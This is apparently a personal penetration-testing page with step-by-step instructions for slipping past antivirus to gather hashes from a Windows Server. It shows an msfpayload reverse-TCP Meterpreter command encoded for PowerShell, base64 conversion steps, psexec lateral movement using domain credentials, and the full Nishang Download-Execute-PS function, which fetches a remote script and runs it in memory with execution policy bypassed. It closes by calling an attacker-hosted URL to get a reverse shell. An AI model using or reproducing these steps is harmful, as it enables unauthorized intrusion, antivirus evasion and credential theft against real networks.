legal contact
 

avoiding AV detection

I'd like to try a more sophisticated way of gathering the hashdump.

With many thanks to:

http://0entropy.blogspot.co.uk/2012/04/powershell-metasploit-meterpreter-and.html

https://www.fishnetsecurity.com/6labs/blog/bypassing-antivirus-powershell

We Need 3 machines for this

  • metasploit (Kali)
  • Windows with powershell
  • The final target (Windows Server)

On Kali:

Create a PowerShell meterpreter

msfpayload windows/meterpreter/reverse_tcp LHOST=[IP of Kali] LPORT=443 R | msfencode -t psh -a x86

On the PowerShell machine

Convert the PS meterpreter Shell to the right Format:

c:\> powershell
PS c:\> $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
PS c:\> $e = [Convert]::ToBase64String($u)
PS c:\> $e
Put this output as a file into an webserver directory on Kali and make sure you can Access/download it
Now get to the target:
c:\> psexec \\[Target] -u domain\jdoe cmd.exe
Create bewlo PS script that downloads and executes your script from Kali and executes it in Memory. (Thanks to Nishang)
function Download-Execute-PS
{
<#
.SYNOPSIS
Nishang Payload which downloads and executes a powershell script.

.DESCRIPTION
This payload downloads a powershell script from specified URL and then executes it on the target.
Use the -nowdownload option to avoid saving the script on the target. Otherwise, the script is saved with a random filename.

.PARAMETER ScriptURL
The URL from where the powershell script would be downloaded.

.PARAMETER Arguments
The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function.
This is to be used when the scripts load a function in memory, true for most scripts in Nishang.

.PARAMETER Nodownload
If this switch is used, the script is not dowloaded to the disk.

.EXAMPLE
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x

.EXAMPLE
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload
The above command does not download the script file to disk and executes the evilscript function inside the evilscript.ps1

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $ScriptURL,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $Arguments,

        [Switch]
        $nodownload
    )
    if ($nodownload -eq $true)
    {
        Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
        if($Arguments)
        {
            Invoke-Expression $Arguments
        }
    }
    else
    {
        $rand = Get-Random
        $webclient = New-Object System.Net.WebClient
        $file1 = "$env:temp\$rand.ps1"
        $webclient.DownloadFile($ScriptURL,"$file1")
        $script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
        Invoke-Expression $pastevalue
    }
}
Call this script to download and run your reverse Shell:
Download-Execute-PS http://[Kali]/ps.txt
Go to your Kali and ejoy the reverse Shell....